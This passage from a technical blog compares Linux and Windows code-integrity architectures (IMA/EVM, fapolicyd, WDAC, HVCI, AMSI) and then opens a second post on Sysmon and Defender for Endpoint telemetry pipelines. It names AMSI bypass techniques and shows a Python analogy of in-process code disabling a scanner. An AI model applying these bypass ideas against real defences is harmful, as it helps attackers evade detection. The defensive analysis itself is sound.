EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid security.evm HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

Bypass class	Linux instance	Windows instance	Root cause	Partial mitigation
Verifier shares address space with attacker	(script interpreters; no in-kernel interpreter scanner)	AMSI prologue patch, `amsiInitFailed` flag flip	Software-only protection of an in-process secret is impossible	ETW patch detection, signed providers, Constrained Language Mode
Trust grant coarser than exploit unit	RPM trust pre-fapolicyd integrity-mode addition	WDAC Publisher rules + LOLBins	Trust algebra cannot express "Microsoft except mshta" with one rule	Hash-level denies, growing block list
Reference value reachable by attacker	IMA without EVM	(HVCI moved the kernel verifier out of reach)	Reference value next to the file under attacker control	EVM HMAC sealed to TPM PCR
Verifier is killable	fapolicyd daemon failure	(HVCI verifier is hypervisor-isolated)	Verifier liveness is part of the trust assumption	TPM-sealed boot policy + kernel-mode fallback

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both stacks is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes an arbitrary binary as input and correctly returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an allowlist of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.
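
The same-address-space problem is easy to reproduce in miniature. The Python sketch below is an analogy, not AMSI: a hypothetical in-process scanner is consulted by the host, and code running in the same process rebinds the check.

```python
class Scanner:
    """Stand-in for an in-process content scanner (hypothetical)."""
    def scan(self, buffer: str) -> str:
        return "detected" if "EVIL" in buffer else "clean"

scanner = Scanner()

def host_evaluate(script: str) -> str:
    """The host asks the scanner before evaluating, as a script host would."""
    return scanner.scan(script)

before = host_evaluate("run EVIL payload")

# Code running inside the same process can simply rebind the check.
Scanner.scan = lambda self, buffer: "clean"

after = host_evaluate("run EVIL payload")
print(before, after)
```

Nothing inside the process can prevent the rebinding, because the code doing it has the same privileges as the code being protected; relocating the verifier is the only structural answer.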

No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous mmap followed by mprotect(PROT_EXEC) all produce executable bytes that did not exist on disk and were never hashed.

The IPE documentation [@docs-kernel-org-lsm-ipehtml] lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.

The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's --module-path and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.

Cryptographic bounds

The cryptographic side, by contrast, is closed.

Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.
A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. fs-verity matches this lower bound.
Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.
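
The arithmetic behind those figures can be checked with a short Python sketch. The throughput is the rough figure quoted above; the 4 KiB block and 32-byte digest used for the tree-depth estimate are assumptions for illustration, not a statement of any filesystem's actual parameters.

```python
import math

def hash_time_ms(size_bytes: int, throughput_bytes_per_s: int) -> float:
    """Time to hash the whole file once at the given throughput."""
    return size_bytes * 1000 / throughput_bytes_per_s

def merkle_levels(size_bytes: int, block: int = 4096, digest: int = 32) -> int:
    """Levels of hash blocks above the data when each block holds block // digest hashes."""
    fanout = block // digest
    nodes = math.ceil(size_bytes / block)
    levels = 0
    while nodes > 1:
        nodes = math.ceil(nodes / fanout)
        levels += 1
    return levels

print(hash_time_ms(100 * 10**6, 2 * 10**9))   # 100 MB at 2 GB/s
print(merkle_levels(100 * 10**6))
```

Under these assumptions a full cold hash of a 100 MB file costs about 50 ms, while a single-block verification walks only three levels of hashes.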

So on the crypto side the gap between upper and lower bounds is closed. On the policy-expressiveness side there is no "best" policy because the right policy depends on threat model. There is no single optimum; there is only a frontier of trade-offs.

Bound	What it says	Mechanism that matches it	Remaining gap
Rice's theorem	"Is this binary malicious?" is undecidable	Every CI stack is an allowlist + signer model	Allowlist composition is itself a policy problem
In-process secret	No purely-software defence inside the attacker's address space	HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM	AMSI design violates this; the gap is structural
Hash verification	$\Omega(n)$ per full read; $O(\log n)$ per partial read	fs-verity per page; IMA cached on `i_iversion`	Cold-cache cost remains O(n) for non-fs-verity files
JIT and dynamic code	No way to verify code that did not exist on disk	None	Restricted-runtime modes (CLM, AppContainer) are the best partial answer
Asymmetric verify	About 60-300 us per RSA-2048 or Ed25519 verify on modern x86	Authenticode catalogues amortise; IMA caches in inode	Cold cache is the only sensitive case

Key idea: Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file imasig signature on every open is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the digest_cache LSM in version 3 of the patchset, posted in February 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom] and covered on LWN [@lwn-net-articles-961591]. The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a digest_cache_lookup() primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.
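
The shape of that design, verify one signed list and then answer per-file questions from a set, can be sketched in Python. This is a conceptual model only: the class and helper names are hypothetical, an HMAC stands in for a real vendor signature, and nothing here reflects the kernel patchset's actual data structures.

```python
import hashlib
import hmac

VENDOR_KEY = b"demo-key"   # stand-in for a vendor signing key; HMAC replaces a real signature

def sign_list(digest_list: bytes) -> bytes:
    return hmac.new(VENDOR_KEY, digest_list, hashlib.sha256).digest()

class DigestCache:
    """Verify one signed digest list up front, then answer lookups from a set."""
    def __init__(self, digest_list: bytes, signature: bytes):
        if not hmac.compare_digest(sign_list(digest_list), signature):
            raise ValueError("digest list signature mismatch")
        self._digests = set(digest_list.decode().split())

    def lookup(self, file_bytes: bytes) -> bool:
        return hashlib.sha256(file_bytes).hexdigest() in self._digests

packaged = [b"#!/bin/sh\necho hello\n", b"\x7fELF-demo-binary"]
digest_list = "\n".join(hashlib.sha256(f).hexdigest() for f in packaged).encode()
cache = DigestCache(digest_list, sign_list(digest_list))
print(cache.lookup(packaged[0]), cache.lookup(b"unpackaged file"))
```

The expensive signature check happens once per list rather than once per file, which is the source of the speedup the cover letter reports.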

By v6 in November 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom-2] the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the linux-integrity list [@lore-kernel-org-linux-integrity]; memory safety of the TLV parser was verified with the Frama-C [@frama-c-com] static analyser. As of late 2024 the work is not yet upstream.

The important framing correction: the Integrity Digest Cache is not a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every AmsiScanBuffer call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (ima_template_fmt) and Windows Measured Boot's WBCL [@trustedcomputinggroup-org-log-format] both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

Problem	Current best partial result	Upstream status
IMA appraisal scale on RPM-signed distros	Integrity Digest Cache, 45-65% appraisal speedup	Patchset v6 (Nov 2024); not upstream
AMSI in-process trust boundary	Signed provider DLLs, ETW patch detection, CLM	Partial; structural fix would be OOP broker
Linux script-content scanning	Nothing in production	Open
Cross-OS attestation interop	TCG CEL, TDX/SEV-SNP quotes	Platform-layer; workload-level still split
WDAC LOLBin treadmill	Microsoft block list + LOLBAS + WDAC Wizard	Operational; structural fix unknown

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore operational, not technological.

10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

If you need...	On Linux, use...	On Windows, use...
TPM-backed remote attestation	IMA + EVM (TPM PCR 10)	Measured Boot + TPM PCR 11 + HVCI
Block unsigned drivers	`module.sig_enforce=1` plus kernel module signing	HVCI (Memory Integrity)
Cryptographic allowlist of installed software	fapolicyd (RPM/DEB trust)	App Control with Publisher rules
Per-app sandbox	AppArmor or SELinux	AppContainer or App Control (no direct equivalent)
Catch in-memory PowerShell payloads	(no direct equivalent)	AMSI
Consumer-grade reputation gating	(no direct equivalent)	Smart App Control
Immutable appliance image	dm-verity + IPE	App Control with hash rules + HVCI
Large APK-style assets verified lazily	fs-verity	(no direct equivalent)

The why behind each row.

TPM-backed attestation. On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.
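
The extend operation that both stacks rely on is small enough to sketch in Python. This is a simplification assuming a SHA-256 PCR bank that starts at all zeros; real measurement-log entries carry more structure than a bare digest, which is not modelled here.

```python
import hashlib

def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM-style extend: new PCR = H(old PCR || measurement digest)."""
    return hashlib.sha256(pcr + measurement).digest()

def replay(log: list[bytes]) -> bytes:
    """Recompute the PCR value a verifier would expect from an event log."""
    pcr = bytes(32)   # PCR starts at all zeros in this sketch
    for entry in log:
        pcr = extend(pcr, hashlib.sha256(entry).digest())
    return pcr

log = [b"/usr/bin/bash", b"/usr/sbin/sshd"]
print(replay(log).hex())
print(replay(list(reversed(log))).hex())
```

Because each value folds in the previous one, the final PCR depends on both the content and the order of every entry; a verifier replays the shipped log and compares the result against the quoted PCR.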

Blocking unsigned drivers. Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

Application allowlisting on general-purpose distributions. This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

Per-app sandboxing. Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; AppContainer or Microsoft Defender Attack Surface Reduction rules are the substitutes.

In-memory PowerShell payloads. AMSI's use case. Linux has nothing equivalent in production.

Consumer reputation gating. Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

Immutable appliance images. Use dm-verity plus IPE on Linux, and App Control hash rules plus HVCI on Windows.

Large lazy-loaded assets. This is fs-verity territory; Windows has no public equivalent.

Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

IMA without EVM and without a TPM-sealed key is decorative. Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
AppArmor profiles authored in complain mode never get promoted to enforce. Schedule a config-management pass that runs aa-enforce on the profiles you actually want to confine.
SELinux setenforce 0 for debugging that becomes permanent. The /.autorelabel flag is required after restoring contexts; track that you flipped it.
fapolicyd permissive-mode lapses. Set up alerting on permissive=1 in the runtime configuration; treat the daemon's exit status as a security event.
WDAC's Enabled:Audit Mode policy-rule option is on by default. Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is off before declaring rollout complete.
HVCI without a driver-compatibility check. Microsoft's DG_Readiness_Tool and the HVCI compatibility report belong in every pilot. Vendors that allocate RWX kernel pages will fail HVCI loading and leave the host unbootable.
Treating AMSI as a control. It is telemetry. Budget for the bypass on day one.
Smart App Control disable is one-way. A single mis-click ends the consumer reputation gate until Windows is clean-installed; Reset This PC does not bring it back. Make sure the user understands this before they tap the toggle.
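
The deployment check suggested for the audit-mode pitfall can be sketched in Python. The XML shape used here (an `Option` element whose text is `Enabled:Audit Mode`) is an assumption about the policy file layout, and the sample documents are hypothetical; verify against a policy exported from your own tooling before relying on it.

```python
import xml.etree.ElementTree as ET

def audit_mode_enabled(policy_xml: str) -> bool:
    """True if any Option element carries the audit-mode rule option."""
    root = ET.fromstring(policy_xml)
    for element in root.iter():
        # Compare local names so the check does not depend on the namespace URI.
        if element.tag.rsplit("}", 1)[-1] == "Option":
            if (element.text or "").strip() == "Enabled:Audit Mode":
                return True
    return False

# Hypothetical, heavily trimmed policy documents.
audit_policy = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <Rules>
    <Rule><Option>Enabled:UMCI</Option></Rule>
    <Rule><Option>Enabled:Audit Mode</Option></Rule>
  </Rules>
</SiPolicy>"""
enforced_policy = audit_policy.replace(
    "<Rule><Option>Enabled:Audit Mode</Option></Rule>", "")

print(audit_mode_enabled(audit_policy), audit_mode_enabled(enforced_policy))
```

Wiring a check like this into the rollout pipeline turns "we forgot to remove audit mode" from a silent gap into a failed gate.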

Note: On Linux: enable IMA in measure mode before appraise; deploy AppArmor / SELinux profiles in complain / permissive before enforce; run fapolicyd with permissive=1 for the first deploy. On Windows: leave WDAC's Enabled:Audit Mode set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.

Note: A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed xattrs, IMA appraisal is mostly a check-box. fapolicyd with integrity=ima may be a saner starting point on machines without TPM.

IMA appraisal on a general-purpose server. Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.

AppArmor or SELinux. AppArmor's path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.

WDAC as a complete allowlist. No. Microsoft's block list [@learn-microsoft-com-bypass-appcontrol] grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.

AMSI despite the bypasses. Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.

HVCI performance cost. On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer) [@learn-microsoft-com-oem-vbs], the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim.

Smart App Control on enterprise devices. Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

From `cmd.exe` to a Kusto Row in 90 Seconds: How Sysmon and Defender for Endpoint Actually Work

noreply@paragmali.com (Parag Mali) — Wed, 13 May 2026 00:00:00 GMT

Modern Windows EDR is a seven-layer production pipeline. A kernel callback fires, a user-mode aggregator labels the event, an ETW publisher (Sysmon) or a TLS-pinned cloud forwarder (`SenseCncProxy.exe`) ships it, and within seconds the event surfaces as a row in a Kusto table that the analyst queries with KQL. Sysmon (Russinovich and Garnier, August 2014) is the configurable kernel-callback-then-publish reference: twenty-nine event IDs, three canonical configurations (SwiftOnSecurity, the post-rename `NextronSystems/sysmon-config`, and `olafhartong/sysmon-modular`), Antimalware-PPL hardening since v15 in June 2023. Microsoft Defender for Endpoint (Windows Defender ATP preview March 2016, MDE rename September 2020, Microsoft Defender XDR portal late 2023) is the commercial cloud-correlated counterpart: `MsSense.exe` runs as Antimalware-PPL, shares the `WdFilter.sys` / `WdBoot.sys` / `WdNisDrv.sys` Defender Antivirus kernel surface, and lands events in six `Device*` Advanced Hunting tables with 30-day in-portal retention, extended via the Microsoft Sentinel Defender XDR connector. For MDE-licensed shops with a detection-engineering team, the community pattern is Hartong's `sysmonconfig-mde-augment.xml` -- Sysmon as a complement, not a duplicate. The pipeline's four structural ceilings (pre-driver-load horizon, observation-vs-enforcement latency, MDE schema truncation, kernel-mode adversary primitive) are documented and unclosed; FalconForce's 2022 CVE-2022-23278 disclosure and InfoGuard Labs' 2025 certificate-pinning bypass bookend an adversarial arc the field has not yet ended.

1. From `cmd.exe` to a Kusto Row in Ninety Seconds

At 9:14 a.m. on a Monday, a SOC analyst named Maya watches a DeviceProcessEvents row light up in the Advanced Hunting console of Microsoft Defender XDR. The FileName is powershell.exe. The ProcessCommandLine reads powershell.exe -enc JABzAD0A.... The InitiatingProcessFileName is WINWORD.EXE. The Timestamp is three seconds ago [@deviceprocessevents-table].

By 9:15:44 Maya has pivoted to DeviceNetworkEvents, found an outbound connection from the same InitiatingProcessId to a previously-unknown IP on TCP/443, clicked Isolate device in the device page, and the endpoint is off the network. Ninety seconds, end to end. Email triage of the original message; a quarantine on the inbound .docm; and -- by the time the user's coffee has cooled -- a brand-new IOC in the tenant's custom indicator list.

This article is the rewind. We walk Maya's ninety seconds backwards through the seven pipeline layers that made the triage possible -- starting in ring zero, ending in the KQL query you can copy into your own tenant -- and along the way we answer the question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone?

The seven layers

Maya is looking at a single Kusto row. Behind that row sit seven distinct software components, each of which can fail independently:

A kernel callback fired inside the nt!PspInsertProcess path on the target machine the instant WINWORD.EXE called CreateProcessW to spawn powershell.exe. The callback handler lives inside WdFilter.sys (Defender Antivirus's filter driver) and inside SysmonDrv.sys if Sysmon is also installed [@pssetcreateex-msdn].
A user-mode aggregator -- MsSense.exe for Defender for Endpoint, or Sysmon.exe (the service) for Sysmon -- received the structured callback notification, enriched it with parent-process state, file hashes, signature information, and identity data, and decided whether the event was worth shipping [@mde-ms-learn][@sysmon-ms-learn].
An ETW publisher -- in Sysmon's case the Microsoft-Windows-Sysmon provider -- emitted the event to the operating system's tracing bus, and the Sysmon service wrote it to the Microsoft-Windows-Sysmon/Operational event log [@sysmon-ms-learn].
A cloud forwarder -- SenseCncProxy.exe -- ran the Defender payload through TLS with certificate pinning out to the regional Defender XDR ingest endpoint [@falconforce-2022].
A cloud sensor pipeline in Microsoft's regional datacenter (the US for US tenants, the EU for European tenants, the UK for UK tenants) wrote the event into the Advanced Hunting Kusto cluster [@advanced-hunting-overview][@ms-server-endpoints-learn].
A Kusto table -- DeviceProcessEvents -- became queryable within seconds, joined logically across roughly fifty columns to its siblings (DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceImageLoadEvents, DeviceEvents) [@deviceprocessevents-table].
A KQL query Maya wrote, or one of Microsoft's built-in detection rules, joined the process row to the network row on (DeviceId, InitiatingProcessId), surfaced the C2 callback inside a ninety-second window, and put the device-isolation button on her screen [@advanced-hunting-overview][@sentinel-xdr-connector].

Each of these seven layers is independently failure-prone. Operating an EDR well -- which is what this article is about -- means knowing which layer produced which artifact, which layer can be tampered with, and which layer is the right one to fix when the row does not arrive.
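
The last layer, the KQL read, is easiest to picture as a keyed join with a time window. Below is a minimal Python sketch of that join, assuming that the process row's `ProcessId` is matched against the network row's `InitiatingProcessId` on the same `DeviceId`. The rows, IP addresses, and the `correlate` helper are hypothetical illustrations, not Microsoft's detection logic.

```python
from datetime import datetime, timedelta

# Hypothetical, trimmed rows; real Device* tables carry many more columns.
process_rows = [
    {"DeviceId": "dev-01", "ProcessId": 4412, "FileName": "powershell.exe",
     "Timestamp": datetime(2026, 1, 5, 9, 0, 0)},
]
network_rows = [
    {"DeviceId": "dev-01", "InitiatingProcessId": 4412,
     "RemoteIP": "203.0.113.7", "Timestamp": datetime(2026, 1, 5, 9, 0, 40)},
    # Same process, but outside the ninety-second window.
    {"DeviceId": "dev-01", "InitiatingProcessId": 4412,
     "RemoteIP": "198.51.100.9", "Timestamp": datetime(2026, 1, 5, 9, 5, 0)},
    # Same PID on a different device: must not match.
    {"DeviceId": "dev-02", "InitiatingProcessId": 4412,
     "RemoteIP": "192.0.2.44", "Timestamp": datetime(2026, 1, 5, 9, 0, 10)},
]


def correlate(procs, nets, window=timedelta(seconds=90)):
    """Pair each process row with network rows it initiated within `window`."""
    hits = []
    for proc in procs:
        for net in nets:
            same_process = (net["DeviceId"], net["InitiatingProcessId"]) == (
                proc["DeviceId"], proc["ProcessId"])
            delay = net["Timestamp"] - proc["Timestamp"]
            if same_process and timedelta(0) <= delay <= window:
                hits.append((proc, net))
    return hits


hits = correlate(process_rows, network_rows)
```

Keying on the device as well as the process ID matters because process IDs are only unique per machine.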

Key idea: Modern Windows EDR is a seven-layer production pipeline: kernel callback, user-mode aggregator, ETW publisher, TLS-pinned cloud forwarder, regional cloud ingest, Kusto table write, KQL read. Sysmon and Microsoft Defender for Endpoint are two implementations of the same seven layers, with different design philosophies at every layer.

Why two products, not one

Sysmon and Defender for Endpoint were not designed as a pair. They evolved as competing answers to the same problem -- when prevention fails, what evidence do you give the responder? -- on the same operating system, with the same kernel-callback APIs underneath, and with the same Event Tracing for Windows (ETW) bus as the transport layer in the middle. They converged on a shared trust model only in 2023, when both products began running as protected processes [@sysmon-ms-learn][@falconforce-2022].

That convergence is not coincidence. It is the consequence of a decade of architectural pressure pushing both products toward the same answer: collect at the Microsoft-sanctioned kernel-callback boundary, normalize in user mode, ship over a tamper-resistant transport, and surface to the analyst as a queryable column family. The differences are in the configuration grammar, the cloud-side enrichment, and the trust boundary at the publisher edge. The seven layers are the same. To see why, we have to start in 2014, when Sysmon shipped with three event types.

2. Twelve Years, Two Arcs, One Convergence

Anton Chuvakin, then a research VP at Gartner, named the category in July 2013. His blog post -- preserved on his personal site after Gartner deleted its analyst blogs in late 2023 -- coined the term Endpoint Threat Detection and Response (ETDR) and defined it as "tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints" [@chuvakin-2013][@wikipedia-edr]. The "T" dropped out of the acronym within eighteen months and the field has been called EDR ever since.

Chuvakin's question -- what evidence do you give the responder when prevention fails? -- got two different answers from inside Microsoft over the next decade. One was free, configurable, and ran on every Windows machine the operator wanted to run it on. The other was commercial, cloud-correlated, and only worked if you paid for it. Both started in the same place: at the supported kernel-callback boundary that Microsoft had been steadily building out since Windows XP.

The Sysmon arc: August 2014 to March 2026

Mark Russinovich gave session HTA-T07R at RSA US 2014 -- Malware Hunting with the Sysinternals Tools -- and the methodology he taught (process-tree pivoting, autoruns enumeration, real-time monitoring of file and registry writes) had a natural conclusion: somebody should ship a Sysinternals tool that did all of that, continuously, into the Windows event log [@russinovich-rsa-2014]. The tool shipped in August 2014, written by Russinovich and Thomas Garnier, also of Microsoft. ZDNet's contemporaneous coverage captured the introduction: "Sysmon, written by Russinovich and Thomas Garnier, also of Microsoft, is the 73rd tool in the set... Note: For public release, Sysmon has been reset to version 1.00" [@zdnet-sysmon-2014]. The launch SKU had three event types: process create (EID 1), file-create-time change (EID 2), and network connect (EID 3).

The design philosophy is captured in a single sentence that Microsoft Learn still prints on the Sysmon download page. That sentence frames Sysmon as a publisher that refuses to do detection and refuses to hide, and it is the foundation of the SwiftOnSecurity-NextronSystems-Hartong configuration lineage that §5 unpacks; the verbatim quote appears in §4 [@sysmon-ms-learn]. Every detection-engineering corpus in the Windows field -- SwiftOnSecurity's config, Florian Roth's fork, Olaf Hartong's modular system, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of that one design choice.

The version history reads as capability accretion, not architectural change. Sysmon v6 in February 2017 added registry events (EIDs 12-14), process-access (10), file-create (11), pipe events (17-18), file-create-stream-hash (15), and the ServiceConfigurationChange (16) audit of Sysmon's own settings [@sysinternals-blog-v6]. (EID 7 ImageLoad arrived earlier, in Sysmon v2.0 -- the §4 catalogue places it correctly.) Sysmon v10 in June 2019 added DNS-query observation via ETW consumption of Microsoft-Windows-DNS-Client; the v10 release date is recorded in the community-curated Sysmon Version History repository, explicitly marked "Outdated" past v11.10 because its maintainer stopped updating it [@sysmon-version-history]. v13 added ClipboardChange and ProcessTampering. v14 in August 2022 added the first preventive event -- FileBlockExecutable (EID 27) -- making Sysmon something subtly more than a publisher [@diversenok-2022][@hartong-sysmon14-medium].

The architectural inflection landed in June 2023 with Sysmon v15, when the Sysmon service began running as a protected process. BleepingComputer's contemporaneous coverage notes that the service ran as PROTECTED_ANTIMALWARE_LIGHT and the schema bumped to 4.90 with the new FileExecutableDetected event ID 29 [@bleepingcomputer-sysmon15][@hartong-sysmon15-medium]. The Microsoft Learn page now states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. The latest published release at the time of writing is v15.2 on March 26, 2026 (per the Sysmon download page's Published by-line), with twenty-nine event types plus EID 255 (Error) [@sysmon-ms-learn].

The MDE arc: March 2016 to late 2023

Microsoft announced Windows Defender Advanced Threat Protection in a Windows Experience blog post on March 1, 2016 -- "Today, we announce the next step in our efforts to protect our enterprise customers, with a new service, Windows Defender Advanced Threat Protection" [@ms-blog-atp-mar2016]. The service was framed as a cloud-correlated detection-and-investigation layer on top of the Windows 10 sensor, "informed by anonymous information from over 1 billion Windows devices" [@ms-blog-atp-mar2016]. The 2016 product was Windows-only, in-portal, and oriented to detection and investigation only.

